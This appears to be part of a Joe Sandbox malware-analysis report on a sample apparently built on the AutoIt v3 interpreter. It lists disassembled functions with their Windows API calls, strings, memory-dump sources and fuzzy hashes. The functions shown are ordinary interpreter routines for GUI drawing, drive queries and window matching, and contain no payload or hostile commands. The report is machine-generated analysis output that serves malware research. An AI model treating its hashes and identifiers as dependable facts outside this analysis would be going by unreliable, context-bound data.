GetDriveTypeW.KERNEL32(?,0020FAC0,?,\\.\,0020F910), ref: 001EADFB
SetErrorMode.KERNEL32(00000000,0020FAC0,?,\\.\,0020F910), ref: 001EAF59

Strings

Fibre, xrefs: 001EAEE9
SSD, xrefs: 001EAE86
Removable, xrefs: 001EAE4D
1394, xrefs: 001EAEDB
RAID, xrefs: 001EAEF7
PhysicalDrive, xrefs: 001EADA7
Virtual, xrefs: 001EAF21
ATAPI, xrefs: 001EAECD
\\.\, xrefs: 001EAD70
SSA, xrefs: 001EAEE2
SAS, xrefs: 001EAF05
ATA, xrefs: 001EAED4
FileBackedVirtual, xrefs: 001EAF28
SATA, xrefs: 001EAF0C
Network, xrefs: 001EAE39
Fixed, xrefs: 001EAE43
RAMDisk, xrefs: 001EAE25
Unknown, xrefs: 001EAE1B, 001EAEBF
CDROM, xrefs: 001EAE2F
SCSI, xrefs: 001EAEC6
USB, xrefs: 001EAEF0
MMC, xrefs: 001EAF1A
iSCSI, xrefs: 001EAEFE

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: c68e57df2e4a0f24414d51bb0f261126503f4be950ef8ea983b23a36945a8426
Instruction ID: ebd799cbdcb79e1ab144c84f76fc428b7353305580cd263e7b475b768492095d
Opcode Fuzzy Hash: c68e57df2e4a0f24414d51bb0f261126503f4be950ef8ea983b23a36945a8426
Instruction Fuzzy Hash: 8951C5F0654B45DBCB14EB52C942CBDB3A1EF1AB04BA04156F407AB291DB30BE11DB63

Function 001868DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00186931
__wcsnicmp.LIBCMT ref: 00186949
__wcsnicmp.LIBCMT ref: 00186961
__wcsnicmp.LIBCMT ref: 00186979
__wcsnicmp.LIBCMT ref: 00186991
__wcsnicmp.LIBCMT ref: 001869A9
__wcsnicmp.LIBCMT ref: 001869C1
__wcsnicmp.LIBCMT ref: 001869D5
__wcsnicmp.LIBCMT ref: 00186A16
__wcsnicmp.LIBCMT ref: 00186A2A
__wcsnicmp.LIBCMT ref: 00186A3E
__wcsnicmp.LIBCMT ref: 00186A52

Strings

#pragma compile, xrefs: 0018692B
Cannot parse #include, xrefs: 001BE3F0
#requireadmin, xrefs: 0018695B
Bad directive syntax error, xrefs: 001BE31A
#include-once, xrefs: 0018698B
#include, xrefs: 001869A3
#cs, xrefs: 001869CF, 00186A24
#comments-end, xrefs: 00186A38
#ce, xrefs: 00186A4C
#comments-start, xrefs: 001869BB, 00186A10
#notrayicon, xrefs: 00186943
#OnAutoItStartRegister, xrefs: 00186973
Unterminated group of comments, xrefs: 001BE403

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: c19e582b76fa601fa87d95f080a3cf221d3a25f82c2a4fb46e457728e625713a
Instruction ID: 276d0dba12317d34423ff966a9449f54a8904fe19739ed1f39a18c7b7f2f1a6d
Opcode Fuzzy Hash: c19e582b76fa601fa87d95f080a3cf221d3a25f82c2a4fb46e457728e625713a
Instruction Fuzzy Hash: E78104B1640205ABCB25BA61DC43FFE37E8AF26704F044025F905AB1D6EB70DB55DBA1

Function 00209A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00209AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00209B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00209BA7

Strings

0, xrefs: 00209BE4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 847e494d3b03934c8a5d78cf3ff2a55772b73908138c0b8b78bae5789b77774d
Instruction ID: 2eb9f16224bed24c8bfab90ba9954d282772772523f2675bb4cb5fc9f14cf4ba
Opcode Fuzzy Hash: 847e494d3b03934c8a5d78cf3ff2a55772b73908138c0b8b78bae5789b77774d
Instruction Fuzzy Hash: C902BD30124302AFE725CF14C848BAABBE5FF4A314F04852DF996966E3C775D9A4CB52

Function 0020A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0020A903
SetTextColor.GDI32(?,?), ref: 0020A907
GetSysColorBrush.USER32(0000000F), ref: 0020A91D
GetSysColor.USER32(0000000F), ref: 0020A928
CreateSolidBrush.GDI32(?), ref: 0020A92D
GetSysColor.USER32(00000011), ref: 0020A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0020A953
SelectObject.GDI32(?,00000000), ref: 0020A964
SetBkColor.GDI32(?,00000000), ref: 0020A96D
SelectObject.GDI32(?,?), ref: 0020A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0020A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0020A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0020A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0020A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0020AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0020AA32
DrawFocusRect.USER32(?,?), ref: 0020AA3D
GetSysColor.USER32(00000011), ref: 0020AA4B
SetTextColor.GDI32(?,00000000), ref: 0020AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0020AA67
SelectObject.GDI32(?,0020A5FA), ref: 0020AA7E
DeleteObject.GDI32(?), ref: 0020AA89
SelectObject.GDI32(?,?), ref: 0020AA8F
DeleteObject.GDI32(?), ref: 0020AA94
SetTextColor.GDI32(?,?), ref: 0020AA9A
SetBkColor.GDI32(?,?), ref: 0020AAA4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 6cb516363bf63f406775e417fa5ebcdd9addb7765c9865bf7b152d9f7dc35af1
Instruction ID: 639626c439ebf6713a50fea70563816a6ec9d17ccc0af24d22c16479af6c5b57
Opcode Fuzzy Hash: 6cb516363bf63f406775e417fa5ebcdd9addb7765c9865bf7b152d9f7dc35af1
Instruction Fuzzy Hash: B3513C71940308EFDF619FA4ED48EAEBB79EB08320F114225F915AB2A2D7719950DF90

Function 002089D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00208AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00208AD2
CharNextW.USER32(0000014E), ref: 00208B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00208B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00208B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00208B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00208B86
SetWindowTextW.USER32(?,0000014E), ref: 00208BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00208BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00208C1F
_memset.LIBCMT ref: 00208C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00208C8D
_memset.LIBCMT ref: 00208CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00208D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00208D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00208E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00208E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00208E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00208EB4
DrawMenuBar.USER32(?), ref: 00208EC3
SetWindowTextW.USER32(?,0000014E), ref: 00208EEB

Strings

0, xrefs: 00208E55

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 9699f85bcd35b4776d10a60e5a014fa18698610a1d48b019cedbefaac6265e3e
Instruction ID: 0fc938373b872d40fca4da460cb23306be0a20f5c534ff2c6706f2bf1db529ba
Opcode Fuzzy Hash: 9699f85bcd35b4776d10a60e5a014fa18698610a1d48b019cedbefaac6265e3e
Instruction Fuzzy Hash: 08E18D70910319ABDF209F60CC88EEF7BB9EF09710F408156F995AA6D2DB708990CF60

Function 0020488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002049CA
GetDesktopWindow.USER32 ref: 002049DF
GetWindowRect.USER32(00000000), ref: 002049E6
GetWindowLongW.USER32(?,000000F0), ref: 00204A48
DestroyWindow.USER32(?), ref: 00204A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00204A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00204ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00204AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00204AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00204B09
IsWindowVisible.USER32(?), ref: 00204B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00204B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00204B58
GetWindowRect.USER32(?,?), ref: 00204B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00204B96
GetMonitorInfoW.USER32(00000000,?), ref: 00204BB0
CopyRect.USER32(?,?), ref: 00204BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00204C32

Strings

(, xrefs: 00204BA3
tooltips_class32, xrefs: 00204A96
0, xrefs: 00204975

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 2a3c16669a2ad866b78d177af0ee8cf93ee13b14b2a0b2d255edb7254dc97fb6
Instruction ID: 7f6e9006278b81812b0942846accdbbf58a37b9a7d1b00a406be03efab01e687
Opcode Fuzzy Hash: 2a3c16669a2ad866b78d177af0ee8cf93ee13b14b2a0b2d255edb7254dc97fb6
Instruction Fuzzy Hash: 7AB1AEB0614341AFD704EF64D988B6ABBE4FF84304F008A1CFA999B2A2D771ED15CB55

Function 001E449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 001E44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001E44D2
_wcscpy.LIBCMT ref: 001E4500
_wcscmp.LIBCMT ref: 001E450B
_wcscat.LIBCMT ref: 001E4521
_wcsstr.LIBCMT ref: 001E452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001E4548
_wcscat.LIBCMT ref: 001E4591
_wcscat.LIBCMT ref: 001E4598
_wcsncpy.LIBCMT ref: 001E45C3

Strings

DefaultLangCodepage, xrefs: 001E45AB
04090000, xrefs: 001E457E
\VarFileInfo\Translation, xrefs: 001E4540
%u.%u.%u.%u, xrefs: 001E4626
StringFileInfo\, xrefs: 001E451B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: ab576669935b390fe6b5788b1a5c2ee486dfa8b507c8a33e3668b8c9858e17ac
Instruction ID: 7f4fcffd7afecbad078c9981da16b4f0b3158bba235817f36a922469c5d3ae76
Opcode Fuzzy Hash: ab576669935b390fe6b5788b1a5c2ee486dfa8b507c8a33e3668b8c9858e17ac
Instruction Fuzzy Hash: 59411276A40300BBDB11AB759C07EBF77ACDF5B710F00046AF905E6183EB74EA1196A9

Function 001827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001828BC
GetSystemMetrics.USER32(00000007), ref: 001828C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001828EF
GetSystemMetrics.USER32(00000008), ref: 001828F7
GetSystemMetrics.USER32(00000004), ref: 0018291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00182939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00182949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0018297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00182990
GetClientRect.USER32(00000000,000000FF), ref: 001829AE
GetStockObject.GDI32(00000011), ref: 001829CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 001829D5

Part of subcall function 00182344: GetCursorPos.USER32(?), ref: 00182357
Part of subcall function 00182344: ScreenToClient.USER32(002457B0,?), ref: 00182374
Part of subcall function 00182344: GetAsyncKeyState.USER32(00000001), ref: 00182399
Part of subcall function 00182344: GetAsyncKeyState.USER32(00000002), ref: 001823A7

SetTimer.USER32(00000000,00000000,00000028,00181256), ref: 001829FC

Strings

AutoIt v3 GUI, xrefs: 00182974

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 72a3c27f5a7789c2878bface19a2a06e64432054fc6dcbbef803ff6a64d9f535
Instruction ID: 1ddc63852d81dae1f4c4c3f3a60c9038940f4b25211399097b1cbab8a35af54b
Opcode Fuzzy Hash: 72a3c27f5a7789c2878bface19a2a06e64432054fc6dcbbef803ff6a64d9f535
Instruction Fuzzy Hash: DDB18E75A4021AEFDB25EFA8DD49BED7BB4FB08310F104129FA15A72A1DB749940CF50

Function 001DA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 001DA47A
__swprintf.LIBCMT ref: 001DA51B
_wcscmp.LIBCMT ref: 001DA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001DA583
_wcscmp.LIBCMT ref: 001DA5BF
GetClassNameW.USER32(?,?,00000400), ref: 001DA5F6
GetDlgCtrlID.USER32(?), ref: 001DA648
GetWindowRect.USER32(?,?), ref: 001DA67E
GetParent.USER32(?), ref: 001DA69C
ScreenToClient.USER32(00000000), ref: 001DA6A3
GetClassNameW.USER32(?,?,00000100), ref: 001DA71D
_wcscmp.LIBCMT ref: 001DA731
GetWindowTextW.USER32(?,?,00000400), ref: 001DA757
_wcscmp.LIBCMT ref: 001DA76B

Part of subcall function 001A362C: _iswctype.LIBCMT ref: 001A3634

Strings

%s%u, xrefs: 001DA515

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: a437e14587517b4518a09e98a969a6d9c398b8a0b9dbad61423b167e6ed0188c
Instruction ID: 3b28238654e4757b8d33b4e04f115c411c04df3dd497d0dbb117e3c86c20c5d7
Opcode Fuzzy Hash: a437e14587517b4518a09e98a969a6d9c398b8a0b9dbad61423b167e6ed0188c
Instruction Fuzzy Hash: 28A1C471204706EFDB14DF64C884BAAB7E8FF54314F44462AF999C2291DB30E955CB92

Function 001DAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 001DAF18
_wcscmp.LIBCMT ref: 001DAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 001DAF51
CharUpperBuffW.USER32(?,00000000), ref: 001DAF6E
_wcscmp.LIBCMT ref: 001DAF8C
_wcsstr.LIBCMT ref: 001DAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 001DAFD5
_wcscmp.LIBCMT ref: 001DAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 001DB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 001DB055
_wcscmp.LIBCMT ref: 001DB065
GetClassNameW.USER32(00000010,?,00000400), ref: 001DB08D
GetWindowRect.USER32(00000004,?), ref: 001DB0F6

Strings

ThumbnailClass, xrefs: 001DAFE0, 001DB060
@, xrefs: 001DAEF9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 3fd5be54c30708813b3403a9d5b20a12d8f35d80a4646eec6da32a9c1ccd5ef3
Instruction ID: 938f09e4d0ca6ba69066e487b68b312dbc1c5e4f326bfc9e81b03e5354fffd12
Opcode Fuzzy Hash: 3fd5be54c30708813b3403a9d5b20a12d8f35d80a4646eec6da32a9c1ccd5ef3
Instruction Fuzzy Hash: 2B81CF71108305DBDB14DF14D8C5FAABBE8EF54314F04856AFD968A292DB30DE49CBA2

Function 0020C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

DragQueryPoint.SHELL32(?,?), ref: 0020C627

Part of subcall function 0020AB37: ClientToScreen.USER32(?,?), ref: 0020AB60
Part of subcall function 0020AB37: GetWindowRect.USER32(?,?), ref: 0020ABD6
Part of subcall function 0020AB37: PtInRect.USER32(?,?,0020C014), ref: 0020ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0020C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0020C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0020C6BE
_wcscat.LIBCMT ref: 0020C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0020C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0020C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0020C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0020C757
DragFinish.SHELL32(?), ref: 0020C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0020C851

Strings

@GUI_DRAGID, xrefs: 0020C7C9
@GUI_DRAGFILE, xrefs: 0020C800
pb$, xrefs: 0020C79B
@GUI_DROPID, xrefs: 0020C77E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb$
API String ID: 169749273-2770908872
Opcode ID: 1ef4dcc832bbb96c29affdc7d40a2406c9f18313e91967c2a76297f5b195fdc0
Instruction ID: 044b38050f8c53e345cbf0d402bfc03d241b281b5e37ac21ced01460563c7965
Opcode Fuzzy Hash: 1ef4dcc832bbb96c29affdc7d40a2406c9f18313e91967c2a76297f5b195fdc0
Instruction Fuzzy Hash: 80619C71108301AFC711EF64DC89DAFBBE8EF99310F500A2EF595921A2DB709A49CF52

Function 001DABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 001DAC33

Strings

LAST, xrefs: 001DABF8
[ALL, xrefs: 001DACD9
[REGEXPTITLE:, xrefs: 001DAC5B
[HANDLE:, xrefs: 001DAC3F
[LAST, xrefs: 001DACE0
HANDLE=, xrefs: 001DAC2C
ACTIVE, xrefs: 001DAC0E
CLASSNAME=, xrefs: 001DAC70
ALL, xrefs: 001DACC7
REGEXP=, xrefs: 001DAC48
[ACTIVE, xrefs: 001DAC20
[CLASS:, xrefs: 001DAC83

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 231b3360caec9ee18c64960bb2efaf01a93c9e79254e7805777a0e1c3691014a
Instruction ID: 6efb1d24f0a245b597931d3b3ab5744bfe77a2fe9744c5acef60a7c67eac52bf
Opcode Fuzzy Hash: 231b3360caec9ee18c64960bb2efaf01a93c9e79254e7805777a0e1c3691014a
Instruction Fuzzy Hash: 9431E6B5A58209A7DF24FB50DD43EAE77A5AF31720FB0002AF401711D1EF61AF14DA52

